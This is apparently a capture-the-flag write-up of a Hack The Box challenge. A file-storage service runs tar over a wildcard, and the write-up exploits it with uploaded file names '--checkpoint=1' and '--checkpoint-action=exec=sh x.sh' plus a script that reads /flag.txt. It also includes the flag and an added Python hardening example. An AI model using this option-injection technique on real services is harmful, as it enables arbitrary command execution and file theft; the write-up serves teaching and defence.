Micro Storage
Easy – Misc
By SlothSpider
Challenge Description
Some group of people seem to have made a network service that lets you store files temporarily. But little did they know about the mistake they made coding their script… Try to get familiar with their service and discover the vulnerability behind it. Your goal is to leak the contents of /flag.txt.
Initial
Here, I was given the following IP: 46.101.23.188:31894
First I tried opening this IP in a web browser, and the page appeared "broken". I also ran Nmap against it and did not learn much. In the end I used netcat to interact with the service.
    nc 46.101.23.188 31894
    [ASCII-art banner: "Micro Storage" - By HackTheBox Labs]
    .-----------------------------------.
    | Welcome to your online temporary  |
    |           Micro Storage           |
    `-----------------------------------'
    \!/ WARNING \!/
    Your storage only lasts during the ongoing session, once the session killed, all your files will be gone.
    Use this service responsibly.
    ---------o---------
    1 => Upload a new file (10 file(s) remaining)
    2 => List your uploaded files (0 file(s) uploaded so far)
    3 => Delete a file
    4 => Print file content
    5 => Compress and download all your files
    0 => Quit (you will lose your files!)
    >>> Choose an option:
Through netcat I could upload a file, list the uploaded files, delete a file, print a file's contents, and download all files as a compressed archive.
After trying a few of these actions, something interesting came up. When I chose option "1" to upload a file, the service asked for a file name.
    1 => Upload a new file (10 file(s) remaining)
    2 => List your uploaded files (0 file(s) uploaded so far)
    3 => Delete a file
    4 => Print file content
    5 => Compress and download all your files
    0 => Quit (you will lose your files!)
    >>> Choose an option: 1
    [*] Enter your file name:
When I tried entering characters such as "!", "@", "#" or "$", the service printed an alert and the program exited.
    1 => Upload a new file (10 file(s) remaining)
    2 => List your uploaded files (0 file(s) uploaded so far)
    3 => Delete a file
    4 => Print file content
    5 => Compress and download all your files
    0 => Quit (you will lose your files!)
    >>> Choose an option: 1
    [*] Enter your file name: !@#
    [-] No no no, you're trying to hack us, good bye.
However, I found that the characters "." and "=" are accepted.
    1 => Upload a new file (10 file(s) remaining)
    2 => List your uploaded files (0 file(s) uploaded so far)
    3 => Delete a file
    4 => Print file content
    5 => Compress and download all your files
    0 => Quit (you will lose your files!)
    >>> Choose an option: 1
    [*] Enter your file name: .=
    [*] Start typing your file content: (send 'EOF' when done)
I also tried option 5, "5 => Compress and download all your files". The service returns a base64 string.
    1 => Upload a new file (10 file(s) remaining)
    2 => List your uploaded files (0 file(s) uploaded so far)
    3 => Delete a file
    4 => Print file content
    5 => Compress and download all your files
    0 => Quit (you will lose your files!)
    >>> Choose an option: 1
    [*] Enter your file name: TEST
    [*] Start typing your file content: (send 'EOF' when done)
    TEST
    EOF
    [+] Your file "TEST" has been saved. (5 bytes written)
    1 => Upload a new file (9 file(s) remaining)
    2 => List your uploaded files (1 file(s) uploaded so far)
    3 => Delete a file
    4 => Print file content
    5 => Compress and download all your files
    0 => Quit (you will lose your files!)
    >>> Choose an option: 5
    [+] Your base64 encoded archive:
    VEVTVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAwMDA2NDQAMDAwMTc1MAAwMDAxNzUwADAwMDAwMDAwMDA1ADE0MTIzNTU2MTA1ADAxMTQ0NwAgMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB1c3RhciAgAHN0b3JhZ2UAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAc3RvcmFnZQAAAAAAA <DELETED> AAAA==
    1 => Upload a new file (9 file(s) remaining)
    2 => List your uploaded files (1 file(s) uploaded so far)
    3 => Delete a file
    4 => Print file content
    5 => Compress and download all your files
    0 => Quit (you will lose your files!)
    >>> Choose an option:
I decoded the base64 and saved the result as a tar file; the tar archive contains the file I uploaded (Figure 1).

One string in the fifth menu option caught my attention.
    5 => Compress and download all your files
Reading this, it is clear that "all" files are compressed with tar. To do so, the program most likely passes a shell wildcard (*) to tar, and that wildcard expansion is a known vulnerability pattern we may be able to use (see this).
Exploit
To exploit it, I created 3 files. The first is a file named "--checkpoint=1", filled with arbitrary characters.
    1 => Upload a new file (10 file(s) remaining)
    2 => List your uploaded files (0 file(s) uploaded so far)
    3 => Delete a file
    4 => Print file content
    5 => Compress and download all your files
    0 => Quit (you will lose your files!)
    >>> Choose an option: 1
    [*] Enter your file name: --checkpoint=1
    [*] Start typing your file content: (send 'EOF' when done)
    firstFile
    EOF
    [+] Your file "--checkpoint=1" has been saved. (10 bytes written)
Next, I created a second file named "--checkpoint-action=exec=sh x.sh", again filled with an arbitrary value.
    1 => Upload a new file (9 file(s) remaining)
    2 => List your uploaded files (1 file(s) uploaded so far)
    3 => Delete a file
    4 => Print file content
    5 => Compress and download all your files
    0 => Quit (you will lose your files!)
    >>> Choose an option: 1
    [*] Enter your file name: --checkpoint-action=exec=sh x.sh
    [*] Start typing your file content: (send 'EOF' when done)
    secondFile
    EOF
    [+] Your file "--checkpoint-action=exec=sh x.sh" has been saved. (11 bytes written)
Finally, I created a third file named "x.sh" with the following contents.
    #!/bin/sh
    value=`cat /flag.txt`
    echo "$value"

    1 => Upload a new file (8 file(s) remaining)
    2 => List your uploaded files (2 file(s) uploaded so far)
    3 => Delete a file
    4 => Print file content
    5 => Compress and download all your files
    0 => Quit (you will lose your files!)
    >>> Choose an option: 1
    [*] Enter your file name: x.sh
    [*] Start typing your file content: (send 'EOF' when done)
    #!/bin/sh
    value=`cat /flag.txt`
    echo "$value"
    EOF
    [+] Your file "x.sh" has been saved. (45 bytes written)
The first file name, which tar interprets as an option (--checkpoint=1), sets how many files are processed before the checkpoint action is run. The second file name, also read as an option (--checkpoint-action=exec=sh x.sh), makes tar execute "sh x.sh" (/bin/sh x.sh) each time a checkpoint is reached. The third file (x.sh) holds the script that is then run, which prints the contents of /flag.txt.
We choose menu option 5 and receive our flag.
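The root cause above is that a shell-expanded wildcard hands file names to tar as if they were arguments, so a name beginning with "--" is parsed as an option. The following Python example is added here and is not the challenge's own service code; it assumes a service written in Python that keeps uploads in a single directory and builds the tar command itself (both assumptions). It shows the risky shell-string form next to a hardened form that validates names, passes an explicit argument list with no shell, and uses the "--" end-of-options marker so that every later argument is treated as a file name.

```python
"""
Added example (not the write-up's or the challenge's code): building a tar
command for a file-storage service without letting uploaded file names be
parsed as tar options.

Assumptions (not stated on the page): the service is a Python script, all
uploads live in one storage directory, and the service runs GNU tar itself.
"""
import re
from typing import Dict, List

# Constructed sample names mirroring the uploads shown in the write-up.
SAMPLE_NAMES = ["TEST", "--checkpoint=1", "--checkpoint-action=exec=sh x.sh", "x.sh", ".="]

# Allow-list: must start with a letter or digit (never '-' or '.'), then a
# short run of letters, digits, dots, underscores or dashes. No '=', spaces,
# slashes or other shell/tar metacharacters.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")


def is_safe_filename(name: str) -> bool:
    """Return True only for names that neither tar nor a shell could
    misread as an option, a path traversal, or a command."""
    return SAFE_NAME.fullmatch(name) is not None


def classify_wildcard_expansion(names: List[str]) -> Dict[str, List[str]]:
    """Model what happens after 'tar cf archive.tar *': every expanded name
    that starts with '-' is consumed by tar as an option, the rest as files.
    Names beginning with '.' are skipped because a plain '*' does not match
    dot-files in a POSIX shell."""
    result: Dict[str, List[str]] = {"options": [], "files": []}
    for n in sorted(names):
        if n.startswith("."):
            continue
        bucket = "options" if n.startswith("-") else "files"
        result[bucket].append(n)
    return result


def unsafe_tar_command(storage_dir: str) -> str:
    """The risky pattern: a shell string with a wildcard. Shown for contrast
    only; it is never executed in this example."""
    return f"cd {storage_dir} && tar cf archive.tar *"


def safe_tar_argv(storage_dir: str, names: List[str]) -> List[str]:
    """Hardened form: validated names, an explicit argv list (no shell),
    '-C' to select the directory, and '--' so that everything after it is
    a file operand even if it begins with '-'."""
    for n in names:
        if not is_safe_filename(n):
            raise ValueError(f"rejected file name: {n!r}")
    return ["tar", "-C", storage_dir, "-cf", "archive.tar", "--", *names]


if __name__ == "__main__":
    print("wildcard expansion model:", classify_wildcard_expansion(SAMPLE_NAMES))
    print("unsafe form:", unsafe_tar_command("/tmp/storage"))
    accepted = [n for n in SAMPLE_NAMES if is_safe_filename(n)]
    print("accepted names:", accepted)
    print("safe argv:", safe_tar_argv("/tmp/storage", accepted))
```

With the hardened form the two "--checkpoint" names never reach tar at all, and even a name that slipped past validation would sit after "--" and be archived as an ordinary file rather than enabling a checkpoint action. A detection-side note for the same bug class: a tar process spawning /bin/sh from a service that only ever archives user uploads is a strong signal worth alerting on.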
    1 => Upload a new file (7 file(s) remaining)
    2 => List your uploaded files (3 file(s) uploaded so far)
    3 => Delete a file
    4 => Print file content
    5 => Compress and download all your files
    0 => Quit (you will lose your files!)
    >>> Choose an option: 5
    HTB{@bus1Ng_gTf0_b1N$_c4n_b3_fUn_s0m3t1meS__r1g|-|t??!!__c4fdecf8}
    [+] Your base64 encoded archive:
    eC5zaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAwMDA2NDQAMDAwMTc1MAAwMDAxNzUwADAwMDAwMDAwMDU1ADE0MTIzNTUxMDQ3ADAxMTU1NQAgMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB1c3RhciAgAHN0b3JhZ2UAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAc3RvcmFnZQ <EDITED> AAAAAA==
    1 => Upload a new file (7 file(s) remaining)
    2 => List your uploaded files (3 file(s) uploaded so far)
    3 => Delete a file
    4 => Print file content
    5 => Compress and download all your files
    0 => Quit (you will lose your files!)
    >>> Choose an option:
The flag is HTB{@bus1Ng_gTf0_b1N$_c4n_b3_fUn_s0m3t1meS__r1g|-|t??!!__c4fdecf8}.